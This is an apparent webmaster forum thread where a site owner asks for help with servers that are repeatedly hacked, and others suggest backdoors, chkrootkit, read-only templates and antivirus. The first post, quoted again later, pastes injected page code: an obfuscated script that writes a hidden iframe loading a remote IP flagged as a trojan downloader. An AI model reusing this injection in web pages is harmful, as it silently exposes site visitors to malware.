Page 1 of 2 12 LastLast
Results 1 to 20 of 21

Thread: I'm getting hacked daily! Need Help!

  1. #1
    I love AskDamageX.com
    Join Date
    Jan 2006
    Posts
    42

    Default I'm getting hacked daily! Need Help!

    Ok, I got three different servers hosted on webair, and all three are getting hacked. this is what I see when I view source.
    <SCRIPT>
    s=unescape("%3Ciframe%20src%3D%22http%3A//58.65.234.9/~momo/traffic/index.php%22%20WIDTH%3D%220%25%22%20HEIGHT%3D%220% 25%22%20MARGINHEIGHT%3D%220%22%20MARGINWIDTH%3D%22 0%22%20SCROLLING%3D%22auto%22%20frameborder%3D%220 %22%20NORESIZE%3E%3C/iframe%3E");document.writeln(s);document.close();
    </SCRIPT>
    But I can't see where it is coming from. All my software is updated. the ftp passwords have all been changed and ssh is turned off except for the access from webair. I use comus thumbs and at3, both free scripts, both are updated.
    So, i think the boxes are pretty much locked down tight, and I am now assuming there is some kind of script inside some kind of shell on my servers which writes this iframe into my index page every couple of hours.
    Is anyone familiar with this? has anyone seen another post where this was successfully removed? Anything? I'll take any leads I can get.
    Thanks

  2. #2
    Who does #2 work for? AmateurFlix's Avatar
    Join Date
    Oct 2005
    Posts
    13,986

    Default

    FYI I got the following warning just from visiting your signup page in your sig:

    Trojan-Downloader.JS.Agent.kd
    http://58.65.234.9/~momo/traffic/index.php
    Hope you get it fixed soon man, your sites were a great resource to set up trades with. I assume this hack is why you closed the signup pages

  3. #3
    I love AskDamageX.com
    Join Date
    Jan 2006
    Posts
    42

    Default

    Yeah, this bastard is killing me. i can't get rid of him/her. I got a tech working on it, but I thought I would hit up the real resource and see if i could dig up some leads.
    I know about the webmasters page. It's getting in everywhere.

  4. #4
    I like money The Professional's Avatar
    Join Date
    Nov 2006
    Location
    Canada
    Posts
    1,511

    Default

    what happened to me might have been different... but you might want to check out this thread
    http://www.askdamagex.com/t21776-we-...urity-now.html

    there is another one kicking around.. but if I were you ... start with taking the exploit out of your templates... and then chmod'ing them to 444 (read-only)

  5. #5
    I love AskDamageX.com
    Join Date
    Jan 2006
    Posts
    42

    Default

    Thanks, but i already saw that post. It's not the same.

    I have had my templates at 444 for several months because of the last time I got hacked. I don't find any scripts in my template files. that's what is so confusing. I don't know where it is coming from.

  6. #6
    Hello. FrozenJag's Avatar
    Join Date
    Nov 2006
    Location
    US
    Posts
    5,502

    Default

    Maybe talk to boneless? I know comus had some troubles with getting hacked awhile back didnt they? Maybe he could help.
    I dont give a lovely mother fuck.

  7. #7
    Serious Contributor Papillon's Avatar
    Join Date
    Oct 2007
    Location
    Brisbane, Australia
    Posts
    883

    Default

    uggg what a PITA

    hope you sort this out romper

  8. #8
    D'oh!! willwank's Avatar
    Join Date
    Oct 2006
    Location
    Hamilton, ON
    Posts
    4,145

    Default

    Quote Originally Posted by romper
    Yeah, this bastard is killing me. i can't get rid of him/her. I got a tech working on it, but I thought I would hit up the real resource and see if i could dig up some leads.
    I know about the webmasters page. It's getting in everywhere.
    I saw google had flagged one of your sites "unsafe" to visit. Might come from these issues you have going with this fucker(s)?
    "If you put a thing in the center of your life, who lacks power to nourish, it will eventually destroy you, and everything you are"
    Oh btw, it's come full circle. Node/V8 - Low Level Server Side JavaScript. Benchmarked here - libs & packages here - read up here
    Other stuff:: Textpattern CMS | Vim | Douglas Crockford | GT.M db |@willwankman | 437654594

  9. #9
    Just trolling
    Join Date
    Oct 2007
    Posts
    2

    Default my advice

    i recommend you to get AVAST is a very good antivirus.

    good luck


  10. #10
    D'oh!! willwank's Avatar
    Join Date
    Oct 2006
    Location
    Hamilton, ON
    Posts
    4,145

    Default

    Quote Originally Posted by SEOVivian
    i recommend you to get AVAST is a very good antivirus.

    good luck

    Now there's a great answer
    "If you put a thing in the center of your life, who lacks power to nourish, it will eventually destroy you, and everything you are"
    Oh btw, it's come full circle. Node/V8 - Low Level Server Side JavaScript. Benchmarked here - libs & packages here - read up here
    Other stuff:: Textpattern CMS | Vim | Douglas Crockford | GT.M db |@willwankman | 437654594

  11. #11
    Serious Contributor Pornonada's Avatar
    Join Date
    Dec 2005
    Location
    Bulgaria
    Posts
    9,607

    Default

    Quote Originally Posted by romper
    Ok, I got three different servers hosted on webair, and all three are getting hacked. this is what I see when I view source.
    <SCRIPT>
    s=unescape("%3Ciframe%20src%3D%22http%3A//58.65.234.9/~momo/traffic/index.php%22%20WIDTH%3D%220%25%22%20HEIGHT%3D%220% 25%22%20MARGINHEIGHT%3D%220%22%20MARGINWIDTH%3D%22 0%22%20SCROLLING%3D%22auto%22%20frameborder%3D%220 %22%20NORESIZE%3E%3C/iframe%3E");document.writeln(s);document.close();
    </SCRIPT>
    But I can't see where it is coming from. All my software is updated. the ftp passwords have all been changed and ssh is turned off except for the access from webair. I use comus thumbs and at3, both free scripts, both are updated.
    So, i think the boxes are pretty much locked down tight, and I am now assuming there is some kind of script inside some kind of shell on my servers which writes this iframe into my index page every couple of hours.
    Is anyone familiar with this? has anyone seen another post where this was successfully removed? Anything? I'll take any leads I can get.
    Thanks
    They have for sure installed a backdoor already, until you find that file(s) whatever you do is worthless...
    who is next after ibill, paymonde ....?

  12. #12

  13. #13
    Serious Contributor
    Join Date
    Dec 2005
    Location
    Buenos Aires
    Posts
    1,263

    Default

    http://www.chkrootkit.org/

    Try downloading and running that on your server. It's a little old, but it checks for a shitload of stuff and does it pretty quickly.

    Make sure you read the documentation though, some things can cause a false positive.
    The Filthy Few - TGP Traffic And Hardlinks
    MILF / Teen / Lesbian / Amateur / Hardcore / Big Boobs
    Signup Forms Always Open!

  14. #14
    I'm just a girl digifan's Avatar
    Join Date
    Oct 2005
    Location
    In your dreams! :)
    Posts
    4,342

    Default

    And a safe server never hurts

  15. #15
    I love AskDamageX.com
    Join Date
    Jan 2006
    Posts
    42

    Default

    Thanks guys! I will let you know when i figure this out. that chkrootkit looks like it might be worth a shot. What I need is a server Guru if anyone knows a god for hire.

  16. #16
    Serious Contributor
    Join Date
    Feb 2007
    Location
    i dont know
    Posts
    834

    Default

    Quote Originally Posted by willwank
    Now there's a great answer
    answer are really good. and this software extreme good for checking pc for viruses (tested by myself).

    passwords been changed before another hack. so i think it about 90% possiblity what guy have something installed at his pc what sending new passes etc to person who hacking these sites.
    LONGBUCKS-Teen, Mature, Reality, Gay sites. Free hosting. FHGs. Free content.Icq - 313-882-945
    Webmaster friendly high recommended programs:
    RoyalCash-Teen ProfitX -Video SmokinCash-Amateur,Lesbo,Squirting

  17. #17
    D'oh!! willwank's Avatar
    Join Date
    Oct 2006
    Location
    Hamilton, ON
    Posts
    4,145

    Default

    Quote Originally Posted by tolik
    answer are really good. and this software extreme good for checking pc for viruses (tested by myself).

    passwords been changed before another hack. so i think it about 90% possiblity what guy have something installed at his pc what sending new passes etc to person who hacking these sites.
    That is true, but I always assume ppl working with online porn have the best security software possible installed on their computers. Anything else is a disaster in the makings.
    "If you put a thing in the center of your life, who lacks power to nourish, it will eventually destroy you, and everything you are"
    Oh btw, it's come full circle. Node/V8 - Low Level Server Side JavaScript. Benchmarked here - libs & packages here - read up here
    Other stuff:: Textpattern CMS | Vim | Douglas Crockford | GT.M db |@willwankman | 437654594

  18. #18
    Serious Contributor
    Join Date
    Feb 2007
    Location
    i dont know
    Posts
    834

    Default

    Quote Originally Posted by willwank
    That is true, but I always assume ppl working with online porn have the best security software possible installed on their computers. Anything else is a disaster in the makings.
    well i had problem with one similar virus with keyloger etc built-in (as i found from info about this virus) and only avast at paranoidal level helped me. all other antiviruses etc does not show anything.
    LONGBUCKS-Teen, Mature, Reality, Gay sites. Free hosting. FHGs. Free content.Icq - 313-882-945
    Webmaster friendly high recommended programs:
    RoyalCash-Teen ProfitX -Video SmokinCash-Amateur,Lesbo,Squirting

  19. #19
    Capo di tutti capi boneless's Avatar
    Join Date
    Oct 2005
    Location
    Rotterdam
    Posts
    3,761

    Default

    sounds to me that the first hack left them with a backdoor on the box, could also be outdated server software.

    any word from webair on what might cause it? any logfiles they got on the box that might be of help?
    icq 14857306
    skype dabone2

  20. #20
    Serious Contributor benito's Avatar
    Join Date
    Oct 2005
    Location
    Argentina
    Posts
    2,308

    Default

    Quote Originally Posted by willwank
    That is true, but I always assume ppl working with online porn have the best security software possible installed on their computers. Anything else is a disaster in the makings.
    Only if they use windows...
    Sign here

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •